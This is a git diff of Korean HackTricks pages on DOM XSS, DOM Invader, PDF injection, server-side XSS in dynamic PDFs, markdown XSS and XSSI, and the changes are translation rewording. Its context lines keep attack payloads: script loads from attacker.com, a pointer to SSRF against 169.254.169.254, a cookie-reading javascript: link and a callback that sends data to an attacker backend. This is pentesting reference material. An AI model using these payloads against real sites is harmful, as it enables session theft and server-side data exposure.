@@ -27,7 +27,7 @@ Burp의 내장 브라우저에서 **Burp 확장**으로 이동하여 활성화
 
 이전 이미지에서 **무작위 문자 그룹, 즉 카나리**를 볼 수 있습니다. 이제 웹의 다양한 부분(매개변수, 양식, URL 등)에 **주입**하기 시작하고 매번 검색을 클릭합니다. DOM Invader는 **카나리가 어떤 흥미로운 싱크에 도달했는지** 확인합니다.
 
-또한, **Inject URL params** 및 Inject forms 옵션은 **새 탭**을 자동으로 열어 **URL** 매개변수와 **양식**에서 발견되는 모든 **카나리**를 **주입**합니다.
+또한, **Inject URL params** 및 Inject forms 옵션은 **새 탭**을 자동으로 열어 **카나리**를 찾은 모든 **URL** 매개변수 및 **양식**에 **주입**합니다.
 
 ### 빈 카나리 주입하기
 
@@ -38,12 +38,12 @@ Burp의 내장 브라우저에서 **Burp 확장**으로 이동하여 활성화
 DOM Invader는 웹 메시지를 사용하여 DOM XSS를 테스트할 수 있도록 하며, 다음과 같은 기능을 제공합니다:
 
 1. **`postMessage()`를 통해 전송된 웹 메시지 로깅**, Burp Proxy의 HTTP 요청/응답 기록 로깅과 유사합니다.
-2. **웹 메시지의 수정** 및 **재발송**을 통해 DOM XSS를 수동으로 테스트할 수 있으며, Burp Repeater의 기능과 유사합니다.
+2. **웹 메시지의 수정** 및 **재발행**을 통해 DOM XSS를 수동으로 테스트할 수 있으며, Burp Repeater의 기능과 유사합니다.
 3. **웹 메시지의 자동 변경** 및 전송을 통해 DOM XSS를 탐색합니다.
 
 #### 메시지 세부정보
 
-각 메시지에 대한 자세한 정보는 클릭하여 볼 수 있으며, 클라이언트 측 JavaScript가 메시지의 `origin`, `data` 또는 `source` 속성에 접근하는지 여부를 포함합니다.
+각 메시지에 대해 클릭하여 자세한 정보를 볼 수 있으며, 여기에는 클라이언트 측 JavaScript가 메시지의 `origin`, `data` 또는 `source` 속성에 접근하는지 여부가 포함됩니다.
 
 - **`origin`** : 메시지의 **origin 정보가 확인되지 않으면**, 임의의 외부 도메인에서 이벤트 핸들러로 교차 출처 메시지를 보낼 수 있습니다. 그러나 확인되면 여전히 안전하지 않을 수 있습니다.
 - **`data`**: 페이로드가 전송되는 곳입니다. 이 데이터가 사용되지 않으면, 싱크는 무용지물입니다.
@@ -63,7 +63,7 @@ DOM Invader는 **프로토타입 오염 취약점**을 검색할 수도 있습
 
 그런 다음, **`Object.prototype`**에 임의의 속성을 추가할 수 있는 **소스**를 **검색**합니다.
 
-무언가가 발견되면 **Test** 버튼이 나타나 **발견된 소스를 테스트**할 수 있습니다. 클릭하면 새 탭이 열리고 콘솔에서 객체를 생성하여 `testproperty`가 존재하는지 확인합니다:
+무언가가 발견되면 **Test** 버튼이 나타나 **발견된 소스**를 **테스트**할 수 있습니다. 클릭하면 새 탭이 열리고 콘솔에서 객체를 생성하여 `testproperty`가 존재하는지 확인합니다:
 ```javascript
 let b = {}
 b.testproperty
@@ -71,7 +71,7 @@ b.testproperty
 소스를 찾으면 **가젯 스캔**을 할 수 있습니다:
 
 1. **DOM** 뷰에서 식별된 프로토타입 오염 소스 옆에 있는 **가젯 스캔** 버튼을 클릭하면 DOM Invader가 새 탭을 엽니다. 적합한 가젯에 대한 스캔이 시작됩니다.
-2. 동시에 같은 탭에서 DevTools 패널에 **DOM Invader** 탭이 열려 있어야 합니다. 스캔이 완료되면 식별된 가젯을 통해 접근 가능한 모든 싱크가 **DOM** 뷰에 표시됩니다. 예를 들어, `innerHTML` 싱크에 전달되는 `html`이라는 가젯 속성이 아래 예제에 표시됩니다.
+2. 한편, 같은 탭에서 DevTools 패널에 **DOM Invader** 탭이 열려 있어야 합니다. 스캔이 완료되면 식별된 가젯을 통해 접근 가능한 모든 싱크가 **DOM** 뷰에 표시됩니다. 예를 들어, `innerHTML` 싱크에 전달되는 `html`이라는 가젯 속성이 아래 예제에 표시됩니다.
 
 ## DOM 클로버링
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
index 5f77b2bea..a225660c6 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -72,7 +72,7 @@ Database
 ## 이를 찾기 위한 도구
 
 - [https://github.com/mozilla/eslint-plugin-no-unsanitized](https://github.com/mozilla/eslint-plugin-no-unsanitized)
-- 잠재적인 싱크에 도달하는 모든 데이터를 확인하는 브라우저 확장: [https://github.com/kevin-mizu/domloggerpp](https://github.com/kevin-mizu/domloggerpp)
+- 잠재적 싱크에 도달하는 모든 데이터를 확인하는 브라우저 확장: [https://github.com/kevin-mizu/domloggerpp](https://github.com/kevin-mizu/domloggerpp)
 
 ## 예시
 
@@ -135,9 +135,9 @@ crypto.generateCRMFRequest()
 
 From: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation)
 
-**Document-domain manipulation vulnerabilities**는 공격자가 제어할 수 있는 데이터를 사용하여 스크립트가 `document.domain` 속성을 설정할 때 발생합니다.
+**Document-domain manipulation vulnerabilities**는 스크립트가 공격자가 제어할 수 있는 데이터를 사용하여 `document.domain` 속성을 설정할 때 발생합니다.
 
-`document.domain` 속성은 브라우저의 **same-origin policy** **강제**에 **중요한 역할**을 합니다. 서로 다른 출처의 두 페이지가 `document.domain`을 **같은 값**으로 설정하면 제한 없이 상호작용할 수 있습니다. 브라우저는 `document.domain`에 할당할 수 있는 값에 대해 특정 **제한**을 두지만, 완전히 관련 없는 값을 실제 페이지 출처에 할당하는 것을 방지합니다. 일반적으로 브라우저는 **자식** 또는 **부모 도메인**의 사용을 허용합니다.
+`document.domain` 속성은 브라우저의 **same-origin policy** **강제**에 **중요한 역할**을 합니다. 서로 다른 출처의 두 페이지가 `document.domain`을 **같은 값**으로 설정하면 제한 없이 상호작용할 수 있습니다. 브라우저는 `document.domain`에 할당할 수 있는 값에 대해 특정 **제한**을 두지만, 완전히 관련 없는 값을 실제 페이지 출처에 할당하는 것을 방지하는 예외가 존재합니다. 일반적으로 브라우저는 **자식** 또는 **부모 도메인**의 사용을 허용합니다.
 
 Sinks:
 ```javascript
@@ -169,7 +169,7 @@ someDOMElement.action
 
 From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation)
 
-**Ajax 요청 조작 취약점**은 스크립트가 `XmlHttpRequest` 객체를 사용하여 발행된 Ajax 요청에 **공격자가 제어할 수 있는 데이터를 기록할 때** 발생합니다.
+**Ajax 요청 조작 취약점**은 스크립트가 `XmlHttpRequest` 객체를 사용하여 발행되는 Ajax 요청에 **공격자가 제어할 수 있는 데이터를 기록할 때** 발생합니다.
 
 Sinks:
 ```javascript
@@ -183,7 +183,7 @@ $.globalEval()
 
 From: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation)
 
-**로컬 파일 경로 조작 취약점**은 스크립트가 **공격자가 제어할 수 있는 데이터를 파일 처리 API**에 `filename` 매개변수로 전달할 때 발생합니다. 이 취약점은 공격자가 URL을 구성하여 다른 사용자가 방문할 경우 **사용자의 브라우저가 임의의 로컬 파일을 열거나 작성하게 할 수 있습니다**.
+**로컬 파일 경로 조작 취약점**은 스크립트가 **공격자가 제어할 수 있는 데이터를 파일 처리 API**에 `filename` 매개변수로 전달할 때 발생합니다. 이 취약점은 공격자가 URL을 구성하여 다른 사용자가 방문할 경우 **사용자의 브라우저가 임의의 로컬 파일을 열거나 작성하게** 할 수 있습니다.
 
 Sinks:
 ```javascript
@@ -247,7 +247,7 @@ From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](
 
 Sinks:
 
-웹 메시지를 전송하기 위한 `postMessage()` 메서드는 메시지를 수신하는 이벤트 리스너가 수신 데이터를 안전하지 않게 처리할 경우 취약점을 초래할 수 있습니다.
+웹 메시지를 전송하기 위한 `postMessage()` 메서드는 메시지를 수신하는 이벤트 리스너가 수신 데이터를 안전하지 않게 처리할 경우 취약점으로 이어질 수 있습니다.
 
 ### DOM 데이터 조작
 
@@ -284,7 +284,7 @@ history.replaceState()
 
 From: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service)
 
-**DOM 기반 서비스 거부 취약점**은 스크립트가 **공격자가 제어할 수 있는 데이터를 문제의 플랫폼 API에 안전하지 않게 전달할 때** 발생합니다. 여기에는 호출 시 사용자의 컴퓨터가 **과도한 CPU 또는 디스크 공간**을 소비하게 할 수 있는 API가 포함됩니다. 이러한 취약점은 브라우저가 `localStorage`에 데이터를 저장하려는 시도를 거부하거나 바쁜 스크립트를 종료함으로써 웹사이트의 기능을 제한하는 등의 중대한 부작용을 초래할 수 있습니다.
+**DOM 기반 서비스 거부 취약점**은 스크립트가 **공격자가 제어할 수 있는 데이터를 문제의 플랫폼 API에 안전하지 않게 전달할 때** 발생합니다. 여기에는 호출될 때 사용자의 컴퓨터가 **과도한 CPU 또는 디스크 공간**을 소비하게 할 수 있는 API가 포함됩니다. 이러한 취약점은 브라우저가 `localStorage`에 데이터를 저장하려는 시도를 거부하거나 바쁜 스크립트를 종료함으로써 웹사이트의 기능을 제한하는 등의 중대한 부작용을 초래할 수 있습니다.
 
 Sinks:
 ```javascript
diff --git a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
index b5cd408ec..75d338f82 100644
--- a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
+++ b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
@@ -7,8 +7,8 @@
 iframed 페이지의 내용을 나타내는 방법은 3가지가 있습니다:
 
 - URL을 나타내는 `src`를 통해 (URL은 교차 출처 또는 동일 출처일 수 있음)
-- `data:` 프로토콜을 사용하여 내용을 나타내는 `src`를 통해
-- 내용을 나타내는 `srcdoc`을 통해
+- `data:` 프로토콜을 사용하여 내용을 나타내는 `src`
+- 내용을 나타내는 `srcdoc`
 
 **부모 및 자식 변수 접근**
 ```html
@@ -81,9 +81,9 @@ src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert
 
 ![](<../../images/image (372).png>)
 
-따라서 **서버에 JS 파일을 업로드하고 iframe을 통해 로드할 수 있다면 CSP를 우회할 수 있습니다. `script-src 'none'`일지라도 가능합니다**. 이는 **동일 사이트 JSONP 엔드포인트를 악용하여도 가능할 수 있습니다**.
+따라서 **서버에 JS 파일을 업로드하고 iframe을 통해 로드할 수 있다면 CSP를 우회할 수 있습니다. `script-src 'none'`인 경우에도 가능합니다**. 이는 **동일 사이트 JSONP 엔드포인트를 악용하여도 가능할 수 있습니다**.
 
-다음 시나리오로 테스트할 수 있습니다. `script-src 'none'`일지라도 쿠키가 도난당하는 경우입니다. 애플리케이션을 실행하고 브라우저로 접근해 보세요:
+다음 시나리오로 테스트할 수 있습니다. `script-src 'none'`인 경우에도 쿠키가 도난당합니다. 애플리케이션을 실행하고 브라우저로 접근해 보세요:
 ```python
 import flask
 from flask import Flask
diff --git a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
index 0d581c78d..3713cad66 100644
--- a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
+++ b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
@@ -26,7 +26,7 @@ MDN의 정보에 따르면, JavaScript에는 네 가지 뚜렷한 호이스팅 
 
 ## Scenarios
 
-따라서 **선언되지 않은 객체**가 사용된 후에 **JS 코드를 주입할 수 있는 시나리오**가 있다면, 이를 선언하여 **구문을 수정**할 수 있습니다(그래서 오류를 발생시키는 대신 코드가 실행됩니다):
+따라서 **선언되지 않은 객체**가 사용된 후 **JS 코드를 주입할 수 있는 시나리오**가 있다면, 이를 선언하여 **구문을 수정**할 수 있습니다(그래야 오류를 발생시키는 대신 코드가 실행됩니다):
 ```javascript
 // The function vulnerableFunction is not defined
 vulnerableFunction('test', '<INJECTION>');
diff --git a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
index e7033204d..d79e5bc2e 100644
--- a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
+++ b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
@@ -108,9 +108,9 @@ log.push(i)
 console.log(log) //34,39,47,96
 //single quote, quotes, backticks & // (regex)
 ```
-### **서로게이트 쌍 BF**
+### **Surrogate Pairs BF**
 
-이 기술은 XSS에는 그다지 유용하지 않지만 WAF 보호를 우회하는 데 유용할 수 있습니다. 이 파이썬 코드는 2바이트를 입력으로 받아들이고, 첫 번째 바이트가 높은 서로게이트 쌍의 마지막 바이트이고 마지막 바이트가 낮은 서로게이트 쌍의 마지막 바이트인 서로게이트 쌍을 검색합니다.
+이 기술은 XSS에는 그다지 유용하지 않지만 WAF 보호를 우회하는 데 유용할 수 있습니다. 이 파이썬 코드는 2바이트를 입력으로 받아들이고, 첫 번째 바이트가 하이 서러게이트 쌍의 마지막 바이트이고 마지막 바이트가 로우 서러게이트 쌍의 마지막 바이트인 서러게이트 쌍을 검색합니다.
 ```python
 def unicode(findHex):
 for i in range(0,0xFFFFF):
@@ -197,7 +197,7 @@ Portswigger의 도구 **Hackability inspector**는 자바스크립트 객체의
 
 ## "--" 할당
 
-감소 연산자 `--`는 할당이기도 합니다. 이 연산자는 값을 가져와서 1만큼 감소시킵니다. 만약 그 값이 숫자가 아니라면 `NaN`으로 설정됩니다. 이는 **환경에서 변수의 내용을 제거하는 데** 사용될 수 있습니다.
+감소 연산자 `--`는 할당이기도 합니다. 이 연산자는 값을 가져온 다음 1만큼 감소시킵니다. 그 값이 숫자가 아닌 경우 `NaN`으로 설정됩니다. 이는 **환경에서 변수의 내용을 제거하는 데** 사용될 수 있습니다.
 
 ![](<../../images/image (993).png>)
 
@@ -241,7 +241,7 @@ test_apply.apply(null, ["arg1", "arg2"])
 ```
 ### 화살표 함수
 
-화살표 함수는 함수를 한 줄로 더 쉽게 생성할 수 있게 해줍니다(이해하고 있다면).
+화살표 함수는 함수를 한 줄로 더 쉽게 생성할 수 있게 해줍니다(이해한다면).
 ```javascript
 // Traditional
 function (a){ return a + 1; }
@@ -315,7 +315,7 @@ console.log(String(afunc)) //This will print the code of the function
 console.log(this.afunc.toString()) //This will print the code of the function
 console.log(global.afunc.toString()) //This will print the code of the function
 ```
-이름이 없는 **함수**의 경우에도 내부에서 **함수 코드**를 여전히 출력할 수 있습니다:
+이름이 없는 **함수**의 경우, 여전히 내부에서 **함수 코드**를 출력할 수 있습니다:
 ```javascript
 ;(function () {
 return arguments.callee.toString()
@@ -343,7 +343,7 @@ return String(this)
 /* Hidden commment */
 })()
 ```
-## Sandbox Escape - Recovering window object
+## Sandbox Escape - window 객체 복구
 
 Window 객체는 alert 또는 eval과 같은 전역적으로 정의된 함수에 접근할 수 있게 해줍니다.
 ```javascript
diff --git a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
index b0903a6db..8851a0df8 100644
--- a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
+++ b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**PDF 파일 내에서 입력이 반영되고 있다면, JavaScript를 실행하거나 PDF 내용을 훔치기 위해 PDF 데이터를 주입해 볼 수 있습니다.**
+**PDF 파일 내에서 입력이 반영되고 있다면, JavaScript를 실행하거나 PDF 콘텐츠를 훔치기 위해 PDF 데이터를 주입해 볼 수 있습니다.**
 
 Chec the post: [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
index 75be102b7..cc025787e 100644
--- a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
+++ b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
@@ -5,17 +5,17 @@
 ## Server Side XSS (Dynamic PDF)
 
 사용자 제어 입력을 사용하여 PDF를 생성하는 웹 페이지가 있는 경우, PDF를 생성하는 **봇을 속여서** **임의의 JS 코드를 실행**하도록 시도할 수 있습니다.\
-따라서 **PDF 생성기 봇이** 어떤 종류의 **HTML** **태그**를 발견하면, 이를 **해석**하게 되며, 이 동작을 **악용**하여 **서버 XSS**를 유발할 수 있습니다.
+따라서 **PDF 생성기 봇이** 어떤 종류의 **HTML** **태그**를 찾으면, 이를 **해석**하게 되고, 이 동작을 **악용**하여 **서버 XSS**를 유발할 수 있습니다.
 
 `<script></script>` 태그는 항상 작동하지 않으므로, JS를 실행하기 위해 다른 방법이 필요합니다(예: `<img` 악용).\
 또한, 일반적인 익스플로잇에서는 생성된 PDF를 **보고/다운로드할 수** 있으므로, JS를 통해 **작성한 모든 것**을 볼 수 있습니다(예: `document.write()` 사용). 그러나 생성된 PDF를 **볼 수 없다면**, 아마도 **웹 요청을 통해 정보를 추출해야** 할 것입니다(블라인드).
 
-### Popular PDF generation
+### 인기 있는 PDF 생성
 
 - **wkhtmltopdf**는 HTML과 CSS를 PDF 문서로 변환하는 능력으로 알려져 있으며, WebKit 렌더링 엔진을 활용합니다. 이 도구는 오픈 소스 명령줄 유틸리티로 제공되어 다양한 애플리케이션에서 접근할 수 있습니다.
 - **TCPDF**는 PDF 생성을 위한 PHP 생태계 내에서 강력한 솔루션을 제공합니다. 이미지, 그래픽 및 암호화를 처리할 수 있어 복잡한 문서를 생성하는 데 유용합니다.
 - Node.js 환경에서 작업하는 경우, **PDFKit**이 유효한 옵션을 제공합니다. HTML 및 CSS에서 직접 PDF 문서를 생성할 수 있어 웹 콘텐츠와 인쇄 가능한 형식 간의 다리를 제공합니다.
-- Java 개발자는 PDF 생성뿐만 아니라 디지털 서명 및 양식 작성과 같은 고급 기능을 지원하는 **iText** 라이브러리를 선호할 수 있습니다. 이 포괄적인 기능 세트는 안전하고 상호작용이 가능한 문서를 생성하는 데 적합합니다.
+- Java 개발자는 PDF 생성뿐만 아니라 디지털 서명 및 양식 작성과 같은 고급 기능을 지원하는 **iText** 라이브러리를 선호할 수 있습니다. 포괄적인 기능 세트로 인해 안전하고 상호작용이 가능한 문서를 생성하는 데 적합합니다.
 - **FPDF**는 단순성과 사용 용이성으로 구별되는 또 다른 PHP 라이브러리입니다. 광범위한 기능 없이 PDF 생성을 위한 간단한 접근 방식을 찾는 개발자를 위해 설계되었습니다.
 
 ## Payloads
@@ -71,7 +71,7 @@ if not, you will at least have wich path the bot is accessing -->
 ```
 ### 외부 스크립트 로드
 
-이 취약점을 악용하는 가장 적합한 방법은 취약점을 이용하여 봇이 로컬에서 제어하는 스크립트를 로드하도록 만드는 것입니다. 그러면 로컬에서 페이로드를 변경하고 매번 동일한 코드로 봇이 이를 로드하도록 할 수 있습니다.
+이 취약점을 악용하는 가장 적합한 방법은 취약점을 이용하여 봇이 로컬에서 당신이 제어하는 스크립트를 로드하도록 하는 것입니다. 그러면 로컬에서 페이로드를 변경하고 매번 동일한 코드로 봇이 이를 로드하도록 할 수 있습니다.
 ```markup
 <script src="http://attacker.com/myscripts.js"></script>
 <img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
@@ -81,7 +81,7 @@ if not, you will at least have wich path the bot is accessing -->
 > [!WARNING]
 > `file:///etc/passwd`를 `http://169.254.169.254/latest/user-data`로 변경하여 **외부 웹 페이지에 접근해 보세요 (SSRF)**.
 >
-> SSRF가 허용되지만 **흥미로운 도메인이나 IP에 도달할 수 없는 경우**, [이 페이지를 확인하여 잠재적인 우회 방법을 찾아보세요](../ssrf-server-side-request-forgery/url-format-bypass.md).
+> SSRF가 허용되지만 **흥미로운 도메인이나 IP에 도달할 수 없는 경우**, [이 페이지를 확인하여 우회 방법을 찾아보세요](../ssrf-server-side-request-forgery/url-format-bypass.md).
 ```markup
 <script>
 x=new XMLHttpRequest;
@@ -152,7 +152,7 @@ checkPort(i);
 ### Attachments: PD4ML
 
 **PDF에 대한 첨부파일을 지정할 수 있는** HTML 2 PDF 엔진이 몇 가지 있습니다, 예를 들어 **PD4ML**. 이 기능을 악용하여 **로컬 파일을 PDF에 첨부할 수 있습니다**.\
-첨부파일을 열기 위해 **Firefox로 파일을 열고 클립 기호를 더블 클릭하여** 첨부파일을 새 파일로 **저장했습니다**.\
+첨부파일을 열기 위해 **Firefox로 파일을 열고 클립 기호를 더블 클릭하여** 첨부파일을 **새 파일로 저장했습니다**.\
 burp로 **PDF 응답을 캡처하면** PDF 내에서 **첨부파일이 일반 텍스트로 표시됩니다**.
 ```html
 <!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
diff --git a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
index 266a98cd1..8f97071b1 100644
--- a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
+++ b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
@@ -2,6 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**이 블로그를 확인하세요: [https://blog.ankursundara.com/shadow-dom/](https://blog.ankursundara.com/shadow-dom/)** 그리고 이 **CTF 챌린지: [https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md](https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md)**
+**이 블로그를 확인하세요: [https://blog.ankursundara.com/shadow-dom/](https://blog.ankursundara.com/shadow-dom/)** 그리고 이 **CTF 도전 과제: [https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md](https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md)**
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
index 2ca30945f..da481120e 100644
--- a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
+++ b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
@@ -13,11 +13,11 @@
 기본적으로 공격 흐름은 다음과 같습니다:
 
 - **악용할 수 있는 콜백을 찾습니다** (잠재적으로 \[\w\\.\_]로 제한됨).
-- 제한이 없고 모든 JS를 실행할 수 있다면, 일반 XSS처럼 이를 악용할 수 있습니다.
+- 제한이 없고 모든 JS를 실행할 수 있다면, 일반 XSS로 이를 악용할 수 있습니다.
 - **피해자가 공격자가 제어하는 페이지를 열도록 만듭니다**.
 - **페이지가 다른 창에서 스스로 열립니다** (새 창은 초기 페이지를 참조하는 **`opener`** 객체를 가집니다).
 - **초기 페이지**는 **흥미로운 DOM**이 위치한 **페이지**를 로드합니다.
-- **두 번째 페이지**는 **콜백을 악용하여 취약한 페이지를 로드하고** **`opener`** 객체를 사용하여 **초기 페이지에서 어떤 작업에 접근하고 실행합니다** (이제 흥미로운 DOM을 포함하고 있습니다).
+- **두 번째 페이지**는 콜백을 악용하여 **취약한 페이지를 로드하고** **`opener`** 객체를 사용하여 **초기 페이지에서 어떤 작업에 접근하고 실행합니다** (이제 흥미로운 DOM이 포함되어 있습니다).
 
 > [!CAUTION]
 > 초기 페이지가 두 번째 페이지를 생성한 후 새 URL에 접근하더라도, **두 번째 페이지의 `opener` 객체는 여전히 새 DOM에서 첫 번째 페이지에 대한 유효한 참조입니다**.
diff --git a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
index 2288f9155..a6d2ed7a9 100644
--- a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
+++ b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-마크다운에 코드를 주입할 기회가 있다면, 코드가 해석될 때 XSS를 트리거할 수 있는 몇 가지 옵션이 있습니다.
+마크다운에 코드를 주입할 기회가 있다면, 코드가 해석될 때 XSS를 유발할 수 있는 몇 가지 옵션이 있습니다.
 
 ### HTML 태그
 
@@ -18,7 +18,7 @@ alert(1)
 
 ### Javascript 링크
 
-HTML 태그가 옵션이 아니라면 항상 markdown 구문으로 시도해 볼 수 있습니다:
+HTML 태그가 옵션이 아닐 경우, 항상 마크다운 구문으로 시도해 볼 수 있습니다:
 ```html
 <!-- markdow link to XSS, this usually always work but it requires interaction -->
 [a](javascript:prompt(document.cookie))
diff --git a/src/pentesting-web/xssi-cross-site-script-inclusion.md b/src/pentesting-web/xssi-cross-site-script-inclusion.md
index c7ec955b1..e91b2ff71 100644
--- a/src/pentesting-web/xssi-cross-site-script-inclusion.md
+++ b/src/pentesting-web/xssi-cross-site-script-inclusion.md
@@ -8,16 +8,16 @@
 
 ### **XSSI**의 주요 특징:
 
-- **SOP 우회**: 스크립트는 **Same-Origin Policy**에서 면제되어 도메인 간에 포함될 수 있습니다.
+- **SOP 우회**: 스크립트는 **Same-Origin Policy**의 적용을 받지 않아 도메인 간에 포함될 수 있습니다.
 - **데이터 노출**: 공격자는 이 동작을 이용해 `script` 태그를 통해 로드된 데이터를 읽을 수 있습니다.
 - **동적 JavaScript/JSONP에 미치는 영향**: **XSSI**는 동적 JavaScript 또는 **JSON with Padding (JSONP)**와 특히 관련이 있습니다. 이러한 기술은 종종 인증을 위해 "ambient-authority" 정보(예: 쿠키)를 사용합니다. 다른 호스트에 스크립트 요청이 이루어질 때, 이러한 자격 증명(예: 쿠키)은 요청에 자동으로 포함됩니다.
-- **인증 토큰 유출**: 공격자가 사용자의 브라우저를 속여 자신이 제어하는 서버에서 스크립트를 요청하게 할 수 있다면, 이러한 요청에 포함된 민감한 정보에 접근할 수 있습니다.
+- **인증 토큰 유출**: 공격자가 사용자의 브라우저를 속여 자신이 제어하는 서버에서 스크립트를 요청하게 만들 수 있다면, 이러한 요청에 포함된 민감한 정보에 접근할 수 있을 것입니다.
 
 ### 유형
 
-1. **정적 JavaScript** - 이는 전통적인 형태의 XSSI를 나타냅니다.
+1. **정적 JavaScript** - XSSI의 전통적인 형태를 나타냅니다.
 2. **인증이 필요한 정적 JavaScript** - 이 유형은 접근을 위해 인증이 필요하다는 점에서 다릅니다.
-3. **동적 JavaScript** - 콘텐츠를 동적으로 생성하는 JavaScript를 포함합니다.
+3. **동적 JavaScript** - 동적으로 콘텐츠를 생성하는 JavaScript를 포함합니다.
 4. **비 JavaScript** - JavaScript와 직접적으로 관련되지 않은 취약점을 나타냅니다.
 
 **다음 정보는 [https://www.scip.ch/en/?labs.20160414](https://www.scip.ch/en/?labs.20160414)**의 요약입니다. 추가 세부정보는 해당 링크를 확인하세요.
@@ -31,11 +31,11 @@
 alert(JSON.stringify(confidential_keys[0]))
 </script>
 ```
-### Dynamic-JavaScript-based-XSSI 및 Authenticated-JavaScript-XSSI
+### Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI
 
-이러한 유형의 XSSI 공격은 사용자의 요청에 따라 기밀 정보가 동적으로 스크립트에 추가되는 것을 포함합니다. 쿠키가 있는 요청과 없는 요청을 보내고 응답을 비교하여 탐지가 가능합니다. 정보가 다르면 기밀 정보가 존재할 수 있음을 나타낼 수 있습니다. 이 프로세스는 [DetectDynamicJS](https://github.com/luh2/DetectDynamicJS) Burp 확장과 같은 도구를 사용하여 자동화할 수 있습니다.
+이러한 유형의 XSSI 공격은 사용자의 요청에 따라 기밀 정보가 동적으로 스크립트에 추가되는 것을 포함합니다. 쿠키가 있는 요청과 없는 요청을 보내고 응답을 비교하여 탐지가 수행될 수 있습니다. 정보가 다르면 기밀 정보의 존재를 나타낼 수 있습니다. 이 프로세스는 [DetectDynamicJS](https://github.com/luh2/DetectDynamicJS) Burp 확장과 같은 도구를 사용하여 자동화할 수 있습니다.
 
-기밀 데이터가 전역 변수에 저장되어 있는 경우, Regular XSSI에서 사용되는 유사한 방법을 사용하여 악용할 수 있습니다. 그러나 기밀 데이터가 JSONP 응답에 포함된 경우, 공격자는 콜백 함수를 탈취하여 정보를 검색할 수 있습니다. 이는 전역 객체를 조작하거나 JSONP 응답에 의해 실행될 함수를 설정하여 수행할 수 있습니다.
+기밀 데이터가 전역 변수에 저장되어 있는 경우, Regular XSSI에서 사용되는 유사한 방법을 사용하여 악용될 수 있습니다. 그러나 기밀 데이터가 JSONP 응답에 포함된 경우, 공격자는 콜백 함수를 탈취하여 정보를 검색할 수 있습니다. 이는 전역 객체를 조작하거나 JSONP 응답에 의해 실행될 함수를 설정하여 수행할 수 있습니다.
 ```html
 <script>
 var angular = function () {
@@ -68,11 +68,11 @@ Array.prototype.slice = function () {
 sendToAttackerBackend(this)
 }
 ```
-공격 벡터에 대한 추가 세부정보는 보안 연구원 [Sebastian Lekies](https://twitter.com/slekies)의 작업에서 찾을 수 있으며, 그는 [벡터](http://sebastian-lekies.de/leak/) 목록을 유지하고 있습니다.
+공격 벡터에 대한 추가 세부정보는 보안 연구원 [Sebastian Lekies](https://twitter.com/slekies)의 작업에서 찾을 수 있으며, 그는 [vectors](http://sebastian-lekies.de/leak/) 목록을 유지하고 있습니다.
 
 ### Non-Script-XSSI
 
